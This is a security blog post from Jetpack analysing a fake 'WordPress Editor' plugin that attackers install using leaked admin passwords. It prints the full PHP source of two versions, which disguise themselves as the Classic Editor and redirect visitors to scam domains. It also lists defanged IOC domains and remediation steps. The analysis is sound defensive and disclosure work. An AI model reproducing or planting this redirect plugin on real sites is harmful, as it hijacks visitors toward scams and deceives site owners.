How Hackers Abuse Leaked Passwords for Profit

Updated on May 27, 2021 - Fioravante Souza

Here at Jetpack, we have noticed an increase in the number of sites affected with a fake plugin ingeniously called: WordPress Editor. And since it’s been happening more frequently, we decided to write about it.

Before we go any further, if you have this plugin installed and activated on your WordPress site, you should immediately follow these steps:

  1. Remove the plugin.
  2. Change your current admin password and make sure to use a strong one.
  3. Review all admin users; if the attacker had access to your site they may have created new users.
  4. Change passwords for any other valid admin accounts.
  5. Enable 2FA for all admin accounts.

Now, with that out of the way, let’s see what this bad code does.

How Passwords Lead to Profit

With most hacking schemes, you can trace the motive back to one thing: money. This is no different. If you’re not practicing strong password hygiene, or are unlucky enough to have your password leaked, you, your site, and your site visitors are all susceptible.

How does it work? Hackers use your password to log into your site and install a fake plugin. This plugin redirects your site traffic to shady websites. They include scam sites selling bogus products, fake dating websites, while others are news combinators loading tons of advertisements that bring revenue to their owners.

Now that you understand why, let’s dig into the how.

Malware Analysis

The malicious plugin runs some pretty simple but effective code. It is circulating in at least three versions, two of which I saw affecting Jetpack users.

During the investigation I saw it loading different pages for different IP addresses I used, but it may be random. Unfortunately, I didn’t manage to access the source code for the doorway site.

WordPress Editor plugin showing up in WP Admin
WordPress Editor 3.0.0 in the wild.

Version 1.0

 
This is the least popular version of the malware. I found it on less than 5% of infected sites; I believe the author is updating the compromised sites to a later version, since most of them haven’t changed their credentials.

The malware author copied parts of the metadata from https://wordpress.org/plugins/classic-editor. This is done to avoid being detected by regular users. Nobody wants to remove the WordPress Editor from their site, right?

This malware adds the function my_function to the wp_loaded action, and this, by itself, is not malicious since plugins and themes can do that, but it is our greatest indicator of compromise. The reason it is suspicious is the usage of my_function instead of something more descriptive. 

As loaded, my_function will first test if the visitor is an admin user and if they came from a referrer (mostly targeting users coming from Search Engines) and redirect to: hxxp://profit-method-here[.]pro.

<?php
/*
Plugin Name: WordPress Editor
Plugin URI:  https://wp.com
Description: Enables the WordPress classic editor and the old-style Edit Post screen with TinyMCE, Meta Boxes, etc. Supports the older plugins that extend this screen.
Version: 	1.0.0
Author:  	WordPress
Author URI:  https://wp.com
License: 	GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
 
function my_function() {
 
     //header("Location: hxxp://www[.]redirect[.]to[.]url[.]com/");
        $is_admin = current_user_can( 'manage_options' );
        $ref = $_SERVER['HTTP_REFERER'];
        if(!$is_admin && !empty($ref)){
            header("Location: hxxp://profit-method-here[.]pro");
            exit();
        } else{
 
        }
}
add_action( 'wp_loaded', 'my_function' );
 
?>

This URL is just a doorway for other levels of redirects. Depending on the IP address origin, referrer, browser, or device, it’ll redirect the visitor to a different website. The final websites are usually those fake news aggregation sites, dating website scams, or crypto currency scams.

We checked some combinations of the requests and got a couple of URLs you may find interesting for adding as IOCs on your systems or to your blocklists.

  • hxxp://income-method[.]org
  • hxxps://tips4bestdiet[.]world

It is also interesting to see that both original URL’s IP addresses and the redirected ones are related to other shady domains or were shared among each other (thank you virustotal.com).

List of shady IP addresses
List of shady IP addresses

Version 3.0.0

And now the most popular version, Version 3, which includes randomly selecting from a list of URLs and a bugfix!

The first version had a bug on the trigger to redirect the site. The way it was checking if HTTP_REFERER exists was probably raising redirects if the website owner reached the login pages by a link, for example. This could be bad for the lifespan of the malware.

Now it’s doing a new check: it validates if $GLOBALS[‘pagenow’] is not the login or register page, which avoids the redirects when an admin tries to login.

A second new feature is the URL list, which doesn’t rely only on a hardcoded URL like version 1.0 but a list of cyrillic encoded URLs which are all .рф (.ru) domains. They seem to be just random names, since I couldn’t translate them to anything intelligible; but they follow the same purpose as the URL from version 1.0, even redirecting to the same sites.

VirusTotal also pointed out that the IP address of those domains was found on seven other pieces of malware. 

<?php
/*
Plugin Name: WordPress Editor
Plugin URI:  https://wp.com
Description: Enables the WordPress classic editor and the old-style Edit Post screen with TinyMCE, Meta Boxes, etc. Supports the older plugins that extend this screen.
Version:     3.0.0
Author:      WordPress
Author URI:  https://wp.com
License:     GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
 
 
// FIX LOGIN PAGE
function is_login_page() {
    return in_array($GLOBALS['pagenow'], array('wp-login.php', 'wp-register.php'));
}
		
function my_function() {
 
        $is_admin = current_user_can( 'manage_options' );
        $ref = $_SERVER['HTTP_REFERER'];
		
		// LINKS
		$urls = ['hxxp://xn--90a8cf[.]xn--p1ai','hxxp://xn--90a7a4a[.]xn--p1ai','hxxp://xn--d1ad5e[.]xn--p1ai','hxxp://xn--i1avu[.]xn--p1ai','hxxp://xn--h1at3a[.]xn--p1ai','hxxp://xn--k1aty[.]xn--p1ai','hxxp://xn--s1afb[.]xn--p1ai'];
	
		$url = "";
		//$url = ;
        if(!$is_admin && !empty($ref) && !is_login_page()){
            header("Location: ".$urls[array_rand($urls)]);
            exit();
        } else{
          
        }
}
add_action( 'wp_loaded', 'my_function' );
 
 
?>

Conclusion

All online websites can be targeted on a malware campaign. It doesn’t matter if you run a small bakery shop or a Wall Street blog: if your credentials are weak or leaked somewhere, they’ll be abused one day or another.

Keep your WordPress up-to-date as well as your extensions. Change your passwords frequently, don’t reuse passwords across sites, and use 2FA anywhere it is possible.

If you’d like help keeping an eye on your site for issues like this, check out Jetpack Scan.

This entry was posted in Security. Bookmark the permalink.
Fioravante Souza profile

Fioravante Souza

Explore the benefits of Jetpack

Learn how Jetpack can help you protect, speed up, and grow your WordPress site.

Get up to 50% off your first year.

Compare plans

Have a question?

Comments are closed for this article, but we're still here to help! Visit the support forum and we'll be happy to answer any questions.

View support forum

  • Enter your email address to follow this blog and receive news and updates from Jetpack!

    Join 112,002 other subscribers

  • Browse by Topic

    • %d bloggers like this: